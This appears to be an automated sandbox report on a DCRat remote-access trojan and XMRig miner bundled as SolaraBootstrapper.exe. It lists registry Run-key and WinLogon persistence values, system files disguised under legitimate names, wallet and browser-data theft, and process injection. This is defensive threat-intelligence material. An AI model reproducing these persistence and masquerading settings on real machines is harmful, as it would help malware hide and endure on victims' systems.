Malware Analysis Report

2024-11-15 05:53

Sample ID: 240722-2lqvysshmp
Target: SolaraBootstrapper.exe
SHA256: f9492af3afb78775082e480af744d660db9da8bc33c3ff63d869abf62d900f6e
Tags: rat dcrat xmrig execution infostealer miner persistence spyware stealer
Score: 10/10


Analysis Overview

Score: 10/10

SHA256

f9492af3afb78775082e480af744d660db9da8bc33c3ff63d869abf62d900f6e

Threat Level: Known bad

The file SolaraBootstrapper.exe was found to be: Known bad.

Malicious Activity Summary

rat dcrat xmrig execution infostealer miner persistence spyware stealer

DcRat

Process spawned unexpected child process

Dcrat family

DCRat payload

xmrig

Modifies WinLogon for persistence

DCRat payload

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Executes dropped EXE

.NET Reactor protector

Reads user/profile data of web browsers

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Enumerates connected drives

Adds Run key to start application

Blocklisted process makes network request

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Modifies data under HKEY_USERS

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Modifies registry class

Uses Task Scheduler COM API

Runs ping.exe

Analysis: static1

Detonation Overview

Reported

2024-07-22 22:40

Signatures

DCRat payload

rat

Dcrat family

dcrat

.NET Reactor protector


Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-07-22 22:40

Reported

2024-07-22 22:43

Platform

win10v2004-20240709-en

Max time kernel

147s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
File created C:\Windows\Globalization\69ddcba757bf72 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\", \"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\", \"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\", \"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\\upfc.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\", \"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\", \"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\\upfc.exe\", \"C:\\Windows\\INF\\unsecapp.exe\", \"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\", \"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\", \"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\\upfc.exe\", \"C:\\Windows\\INF\\unsecapp.exe\", \"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\", \"C:\\Users\\Admin\\AppData\\Local\\fontdrvhost.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\", \"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\", \"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\\upfc.exe\", \"C:\\Windows\\INF\\unsecapp.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\", \"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\", \"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\\upfc.exe\", \"C:\\Windows\\INF\\unsecapp.exe\", \"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\", \"C:\\Users\\Admin\\AppData\\Local\\fontdrvhost.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

xmrig

miner xmrig

DCRat payload

rat

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor protector


Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\DriversavessessionDlldhcp\Roblox.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\solara.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WaaSMedicAgent = "\"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Windows\\INF\\unsecapp.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Globalization\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WaaSMedicAgent = "\"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Windows\\INF\\unsecapp.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Admin\\AppData\\Local\\fontdrvhost.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Globalization\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\\upfc.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Admin\\AppData\\Local\\fontdrvhost.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\\upfc.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSC62BB1B8EFB064D2FB0E4DA2F7861CE5D.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\pd9v1t.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 6816 set thread context of 4764 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmexec\lib\is-windows.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\cacache\lib\memoization.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\fs.realpath\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\read\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\.github\workflows\tests.yml C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-rebuild.html C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-pack.html C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-collect\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-ping.html C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\unique-slug\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmpack\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-bundled\lib\index.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\cli-table3\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmexec\lib\get-bin-from-manifest.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\wcwidth\index.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\generator\ninja.py C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\error.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\lib\commands\pack.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_etw_provider.man C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-json-stream\node_modules\minipass\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\isexe\mode.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\iconv-lite\lib\streams.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\updater.d.ts C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks-proxy-agent\dist\index.js.map C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\corepack.cmd C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\safer-buffer\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-explore.1 C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmpublish\lib\publish.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-search.html C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\types\utility.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks\build\client\socksclient.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\get-workspace-nodes.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\buffer\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\minipass-fetch\lib\fetch-error.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\identity\oauth.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\lib\commands\exec.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\license C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\proc-log\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\maps\random.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\npmrc C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\cssesc\bin\cssesc C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\diff\lib\util\array.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\abort-controller\browser.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-install-test.html C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\models\root.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\man\man7\workspaces.7 C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\cacache\lib\get.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\are-we-there-yet\lib\tracker.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\debug\src\browser.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\lru-cache\index.mjs C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\yallist\yallist.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-search.md C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\models\index.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\text-table\example\dotalign.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\ranges\max-satisfying.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\encoding\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-rebuild.md C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\ranges\valid.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\unique-slug\lib\index.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-access.html C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\INF\29c1c3cc0f7685 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\MSIB093.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB140.tmp C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\INF\unsecapp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\e6c9b481da804f C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File opened for modification C:\Windows\Installer\MSI9B78.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Globalization\69ddcba757bf72 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\INF\unsecapp.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\MSICC00.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57ab15.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC288.tmp C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\ServiceProfiles\LocalService\AppData\Local\WaaSMedicAgent.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Windows\Globalization\smss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\ImmersiveControlPanel\de-DE\fontdrvhost.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\OfficeClickToRun.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Windows\Globalization\smss.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
